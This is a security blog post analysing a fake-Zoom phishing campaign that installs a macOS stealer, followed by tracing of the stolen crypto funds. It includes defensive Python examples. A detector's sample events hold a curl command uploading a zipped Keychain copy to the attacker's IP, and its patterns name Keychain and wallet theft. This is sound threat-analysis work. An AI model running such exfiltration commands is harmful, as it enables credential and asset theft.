Seeing is Deceiving | Analysis of Fake Zoom Meeting Phishing Attack

SlowMist
7 min read · 1 day ago


Author | Reborn, Lisa
Editor | Liz

Background

Recently, several users on X reported a phishing attack disguised as Zoom meeting links. In one case, a victim installed malicious software after clicking on a fake Zoom meeting link, resulting in the theft of cryptocurrency assets worth millions of dollars. Against this backdrop, the SlowMist security team conducted an analysis of this type of phishing incident and attack method while tracing the hackers’ fund flows.

https://x.com/lsp8940/status/1871350801270296709

Phishing Link Analysis

The attacker used a domain resembling “app[.]us4zoom[.]us” to impersonate a legitimate Zoom meeting link. The webpage closely mimicked the genuine Zoom meeting interface. When users clicked the “Launch Meeting” button, it triggered the download of a malicious installation package instead of launching the local Zoom client.
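A look-alike such as app[.]us4zoom[.]us works because people (and naive filters) see the string "zoom" and stop reading. The check that defeats it is to compare the link's host against Zoom's registrable domain rather than searching for a substring. The following Python is an added example written for this article, not SlowMist's code; the allow-list of Zoom domains and the sample links are assumptions constructed for the demonstration.

```python
# Added example (not from the SlowMist post): decide whether a meeting link's
# host really belongs to Zoom instead of merely containing the word "zoom".
from urllib.parse import urlparse

# Registrable domains Zoom uses for meeting links. Assumption for this example;
# an organisation would maintain its own allow-list.
LEGIT_ZOOM_DOMAINS = {"zoom.us", "zoom.com"}


def normalise_host(url: str) -> str:
    """Return the lower-cased hostname, undoing the [.] and [:] defanging used in reports."""
    cleaned = url.replace("[.]", ".").replace("[:]", ":").strip()
    if "://" not in cleaned:
        cleaned = "https://" + cleaned
    host = urlparse(cleaned).hostname or ""
    return host.rstrip(".").lower()


def is_legit_zoom_link(url: str) -> bool:
    """True only if the host is exactly a Zoom domain or a subdomain of one.

    Anchoring on the registrable domain is what rejects look-alikes such as
    app.us4zoom.us (different domain) or zoom.us.example.com (Zoom as a prefix).
    """
    host = normalise_host(url)
    return any(host == d or host.endswith("." + d) for d in LEGIT_ZOOM_DOMAINS)


def classify_links(urls):
    """Return {url: 'ok' | 'suspicious'} for a batch of links."""
    return {u: ("ok" if is_legit_zoom_link(u) else "suspicious") for u in urls}


if __name__ == "__main__":
    # Constructed sample: the phishing host from the post plus typical look-alikes.
    samples = [
        "https://app[.]us4zoom[.]us/j/123456789",
        "https://us04web.zoom.us/j/123456789",
        "https://zoom.us.meeting-invite.example/j/1",
        "https://zoom-us.example/j/1",
    ]
    for url, verdict in classify_links(samples).items():
        print(f"{verdict:10s} {url}")
```

The same host comparison belongs in a mail gateway or browser policy; the point is that "contains zoom" is never the test, "is zoom.us or a subdomain of it" is.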

By probing the aforementioned domain, we discovered the attacker’s monitoring log address: https[:]//app[.]us4zoom[.]us/error_log

Decrypting the log revealed entries written by a script that sends notifications through the Telegram API; the messages are in Russian.

The site was deployed 27 days ago, and the hackers are likely Russian. Since November 14, they have been targeting victims and using the Telegram API to monitor whether anyone clicked the download button on the phishing page.

Malware Analysis

The malicious installation package is named “ZoomApp_v.3.14.dmg.” Opening the phishing disk image tricks the user into executing the malicious script ZoomApp.file in Terminal, and during execution the script further prompts the user to enter their system password.

Below is the execution content of the malicious file:

After decoding the above content, it was revealed to be a malicious osascript script.

Further analysis revealed that the script searches for a hidden executable file named “.ZoomApp” and runs it locally. A disk analysis of the original installation package, “ZoomApp_v.3.14.dmg,” confirmed the presence of a hidden executable file named “.ZoomApp.”
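A disk image whose visible launcher is a script and whose real payload is a dot-file Mach-O binary is a pattern worth checking for before anything is run. The following Python is an added triage example written for this article, not SlowMist's tooling: it walks an extracted or mounted image tree and reports hidden files that carry an execute bit or a Mach-O magic number. The sample tree it builds (a decoy ZoomApp.file and a hidden .ZoomApp with a Mach-O header) is constructed for the demonstration.

```python
# Added example (not SlowMist's code): triage a mounted/extracted disk image
# tree for hidden executables such as the ".ZoomApp" file found in this DMG.
import os
import stat
import tempfile

# Mach-O magic numbers: 32/64-bit thin in both byte orders, plus fat/universal.
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",
    b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca",
}


def is_macho(path: str) -> bool:
    """True if the file starts with a Mach-O magic number."""
    with open(path, "rb") as f:
        return f.read(4) in MACHO_MAGICS


def find_hidden_executables(root: str):
    """Return sorted relative paths of dot-files that are executable or Mach-O.

    A legitimate installer has no reason to hide a native binary behind a
    leading dot, so every hit deserves a look before anything is launched.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.startswith("."):
                continue
            full = os.path.join(dirpath, name)
            mode = os.lstat(full).st_mode
            if stat.S_ISLNK(mode):
                continue
            exec_bit = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
            if exec_bit or is_macho(full):
                findings.append(os.path.relpath(full, root))
    return sorted(findings)


def build_sample_image(root: str):
    """Constructed stand-in for the mounted DMG: decoy script, hidden Mach-O, Finder metadata."""
    with open(os.path.join(root, "ZoomApp.file"), "w") as f:
        f.write("#!/bin/bash\n# decoy launcher (constructed)\n")
    hidden = os.path.join(root, ".ZoomApp")
    with open(hidden, "wb") as f:
        f.write(b"\xcf\xfa\xed\xfe" + b"\x00" * 28)  # 64-bit little-endian Mach-O magic
    os.chmod(hidden, 0o755)
    with open(os.path.join(root, ".DS_Store"), "wb") as f:
        f.write(b"\x00\x00\x00\x01Bud1")  # harmless Finder metadata, not executable


def demo():
    """Build the constructed tree in a temp dir and return what the scan flags."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_image(root)
        return find_hidden_executables(root)


if __name__ == "__main__":
    for hit in demo():
        print("hidden executable:", hit)
```

On a real case, point find_hidden_executables at the mount point of the image (or at a directory the image was extracted into) instead of the constructed tree.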

Malicious Behavior Analysis

Static Analysis

We uploaded the binary file to a threat intelligence platform for analysis and found that the file had already been flagged as malicious.

https://www.virustotal.com/gui/file/e4b6285e183dd5e1c4e9eaf30cec886fd15293205e706855a48b30c890cbf5f2

Through static disassembly analysis, the following image shows the entry code of the binary file, which is used for data decryption and script execution.

The following image shows the data section, where most of the information is encrypted and encoded.

After decrypting the data, it was discovered that the binary file ultimately executes a malicious osascript script (the full decrypted code is shared here: https://pastebin.com/qRYQ44xa). This script collects information from the user's device and sends it to the backend.

The following image shows part of the code that enumerates different plugin ID paths.

The following image shows part of the code that reads information from the computer’s KeyChain.

After the malicious code collects system information, browser data, cryptocurrency wallet data, Telegram data, Notes data, and Cookie data, it compresses the gathered information and sends it to a server controlled by the hacker (141.98.9.20).

Since the malicious program prompts the user to input their password during execution, and subsequent malicious scripts collect KeyChain data from the computer (which may contain various passwords stored on the device), the hacker will attempt to decrypt the data after collecting it. This allows the hacker to gain access to sensitive information such as the user’s wallet mnemonic phrase and private key, ultimately leading to the theft of the user’s assets.

Analysis shows that the hacker’s server IP address is located in the Netherlands and has currently been flagged as malicious by threat intelligence platforms.

https://www.virustotal.com/gui/ip-address/141.98.9.20

Dynamic Analysis

The malicious program was executed in a virtual environment for dynamic analysis, and the process was monitored. Below is the process information showing how the malicious program collects local data and sends it to the attacker’s backend server.
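The sequence the static and dynamic analysis describe (an osascript password prompt, reads of Keychain and wallet data, archiving, then an upload to 141.98.9.20) is exactly the kind of multi-stage chain that a process-tree detection can score. The following Python is an added example written for this article, not SlowMist's code: it runs a small rule set over constructed process and network events shaped like what a sandbox would record, groups them by root process, and flags a chain when several distinct stages appear under one parent. The event lines are constructed; only the server IP comes from the post.

```python
# Added example (not from the SlowMist post): rule-based detection over
# constructed process/network events resembling the observed infection chain.
import re
from collections import defaultdict

C2_IOCS = {"141.98.9.20"}  # attacker server IP reported in the post

# Each rule: (stage name, predicate over one event dict)
RULES = [
    ("password_prompt", lambda e: e["proc"] == "osascript"
        and "hidden answer" in e["cmdline"]),
    ("sensitive_read", lambda e: re.search(
        r"Library/Keychains|Electrum|Exodus|Telegram|Cookies", e["cmdline"]) is not None),
    ("archive", lambda e: e["proc"] in {"zip", "ditto", "tar"}),
    ("exfil_to_ioc", lambda e: e.get("dst_ip") in C2_IOCS),
    ("upload_to_raw_ip", lambda e: e["proc"] == "curl"
        and re.search(r"https?://\d+\.\d+\.\d+\.\d+", e["cmdline"]) is not None),
]


def root_of(pid, parent):
    """Walk ppid links up to the first process whose parent was not recorded."""
    while parent.get(pid) in parent:
        pid = parent[pid]
    return pid


def detect(events, min_stages=2):
    """Return {root_pid: sorted stage names} for process trees that hit at least
    `min_stages` distinct stages. A single zip or curl is noise; a tree that
    prompts for a password, reads the Keychain and uploads to a raw IP is not."""
    parent = {e["pid"]: e["ppid"] for e in events}
    stages = defaultdict(set)
    for e in events:
        for name, rule in RULES:
            if rule(e):
                stages[root_of(e["pid"], parent)].add(name)
    return {pid: sorted(s) for pid, s in stages.items() if len(s) >= min_stages}


# Constructed sample events (not real sandbox output). pids/ppids are invented;
# 203.0.113.10 is a documentation address standing in for benign traffic.
EVENTS = [
    {"pid": 500, "ppid": 1,   "proc": "bash",      "cmdline": "bash ZoomApp.file"},
    {"pid": 501, "ppid": 500, "proc": "osascript", "cmdline":
        'osascript -e \'display dialog "Zoom needs your password" default answer "" with hidden answer\''},
    {"pid": 502, "ppid": 500, "proc": ".ZoomApp",  "cmdline": "/Volumes/ZoomApp/.ZoomApp"},
    {"pid": 503, "ppid": 502, "proc": "cp",        "cmdline": "cp -r /Users/victim/Library/Keychains /tmp/.z/"},
    {"pid": 504, "ppid": 502, "proc": "zip",       "cmdline": "zip -r /tmp/.z.zip /tmp/.z"},
    {"pid": 505, "ppid": 502, "proc": "curl",      "cmdline": "curl -F file=@/tmp/.z.zip http://141.98.9.20/upload",
        "dst_ip": "141.98.9.20"},
    # benign noise that must not fire on its own
    {"pid": 600, "ppid": 1,   "proc": "zip",       "cmdline": "zip report.zip report.pdf"},
    {"pid": 601, "ppid": 1,   "proc": "curl",      "cmdline": "curl https://example.com/",
        "dst_ip": "203.0.113.10"},
]


if __name__ == "__main__":
    for pid, hit in detect(EVENTS).items():
        print(f"root pid {pid}: {', '.join(hit)}")
```

The IOC rule is the brittle one (the next campaign will use a different server); the password-prompt, Keychain-read and raw-IP-upload stages describe the technique and keep working when the infrastructure changes.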

MistTrack Analysis

We used the on-chain tracking tool MistTrack to analyze the hacker’s address provided by the victim: 0x9fd15727f43ebffd0af6fecf6e01a810348ee6ac. The hacker address has profited over 1 million USD, including USD0++, MORPHO, and ETH. Among them, USD0++ and MORPHO were swapped to 296 ETH.

According to MistTrack, the hacker’s address received small ETH transfers from the address 0xb01caea8c6c47bbf4f4b4c5080ca642043359c2e, which is suspected to be providing transaction fees for the hacker’s address. The address (0xb01c) has only one source of income but transfers small amounts of ETH to nearly 8,800 addresses, suggesting it may be a “platform dedicated to providing transaction fees.”
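The pattern described for 0xb01c (a single funding source, tiny ETH transfers fanned out to thousands of addresses) can be expressed as a simple heuristic over a transfer list, and the addresses it funded can then be pulled out for closer inspection, which is the filtering step described next in the post. The following Python is an added example written for this article, not MistTrack's or SlowMist's code; the transfer records are constructed, and only the two addresses labelled as such come from the post.

```python
# Added example (not MistTrack's or SlowMist's code): a heuristic for spotting
# "gas provider" addresses like 0xb01c: one inbound source, many tiny outbound
# ETH transfers, and a helper to list the addresses such a provider funded.
from collections import defaultdict

PROVIDER = "0xb01caea8c6c47bbf4f4b4c5080ca642043359c2e"  # address from the post
HACKER = "0x9fd15727f43ebffd0af6fecf6e01a810348ee6ac"    # address from the post
FUNDER = "0x" + "f" * 40                                  # constructed
HOT_WALLET = "0x" + "e" * 40                              # constructed


def find_fee_providers(transfers, max_out_eth=0.01, min_recipients=100, max_sources=1):
    """transfers: iterable of (sender, receiver, amount_eth).

    Returns {address: {"sources", "recipients", "avg_out"}} for addresses whose
    outbound pattern looks like a fee-distribution service: few inbound sources,
    many distinct recipients, every outbound transfer below max_out_eth.
    Thresholds are assumptions for this example and should be tuned per chain.
    """
    inbound = defaultdict(set)
    outbound = defaultdict(list)
    for src, dst, amt in transfers:
        inbound[dst].add(src)
        outbound[src].append((dst, amt))
    hits = {}
    for addr, outs in outbound.items():
        recipients = {d for d, _ in outs}
        amounts = [a for _, a in outs]
        if (len(inbound[addr]) <= max_sources
                and len(recipients) >= min_recipients
                and max(amounts) <= max_out_eth):
            hits[addr] = {
                "sources": len(inbound[addr]),
                "recipients": len(recipients),
                "avg_out": sum(amounts) / len(amounts),
            }
    return hits


def funded_by(transfers, provider):
    """Set of addresses that received ETH from `provider`, the candidate list to
    cross-check against drainer/theft labels."""
    return {dst for src, dst, _ in transfers if src == provider}


def build_sample():
    """Constructed ledger: funder -> provider -> 300 recipients of 0.002 ETH,
    plus a busy hot wallet with many sources that must NOT be flagged."""
    t = [(FUNDER, PROVIDER, 10.0)]
    for i in range(299):
        t.append((PROVIDER, f"0x{i:040x}", 0.002))
    t.append((PROVIDER, HACKER, 0.002))
    for i in range(50):
        t.append((f"0x{1000 + i:040x}", HOT_WALLET, 5.0))
    for i in range(150):
        t.append((HOT_WALLET, f"0x{2000 + i:040x}", 0.5))
    return t


SAMPLE = build_sample()

if __name__ == "__main__":
    for addr, info in find_fee_providers(SAMPLE).items():
        print(addr, info)
        print("funded addresses:", len(funded_by(SAMPLE, addr)))
```

On real data the transfer list would come from an indexer or explorer export; the hot wallet in the sample shows why the single-source condition matters, since exchanges also fan out to many recipients but are fed by many depositors.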

By filtering the addresses to which 0xb01c transferred funds, we identified two addresses marked as malicious, one of which is tagged as “Pink Drainer.” Further analysis of these two phishing addresses reveals that the funds were primarily transferred to ChangeNOW and MEXC.

Further analysis of the stolen funds’ transfer reveals that a total of 296.45 ETH was moved to a new address: 0xdfe7c22a382600dcffdde2c51aaa73d788ebae95.

The first transaction of the new address (0xdfe7) occurred in July 2023, involving multiple chains. The current balance of the address is 32.81 ETH.

The main ETH transfer paths from the new address (0xdfe7) are as follows:

  • 200.79 ETH -> 0x19e0…5c98f
  • 63.03 ETH -> 0x41a2…9c0b
  • 8.44 ETH -> Exchanged for 15,720 USDT
  • 14.39 ETH -> Gate.io

The subsequent transfers from the expanded addresses are associated with multiple platforms such as Bybit, Cryptomus.com, Swapspace, Gate.io, and MEXC. These transfers also link to multiple addresses flagged by MistTrack as “Angel Drainer” and “Theft.” Additionally, there is currently 99.96 ETH remaining in the address 0x3624169dfeeead9f3234c0ccd38c3b97cecafd01.

The new address (0xdfe7) also shows a significant number of USDT transactions, with funds being transferred to platforms such as Binance, MEXC, FixedFloat, and others.

Summary

This phishing method involves hackers disguising a link as a legitimate Zoom meeting invitation, tricking users into downloading and executing malicious software. The malware typically has multiple harmful functions, including collecting system information, stealing browser data, and accessing cryptocurrency wallet information, which is then transmitted to servers controlled by the hackers. These types of attacks often combine social engineering and Trojan techniques, making users vulnerable to exploitation. The SlowMist Security Team advises users to carefully verify meeting links before clicking, avoid executing unknown software and commands, install antivirus software, and update it regularly. For more security tips, check out the Blockchain Dark Forest Selfguard Handbook by SlowMist Security Team: https://github.com/slowmist/Blockchain-dark-forest-selfguard-handbook/blob/main/README_CN.md

About SlowMist

SlowMist is a blockchain security firm established in January 2018. The firm was started by a team with over ten years of network security experience with the aim of becoming a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.

SlowMist offers a variety of services that include but are not limited to security audits, threat information, defense deployment, security consultants, and other security-related services. We also offer AML (Anti-money laundering) software, MistEye (Security Monitoring), SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.

By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.
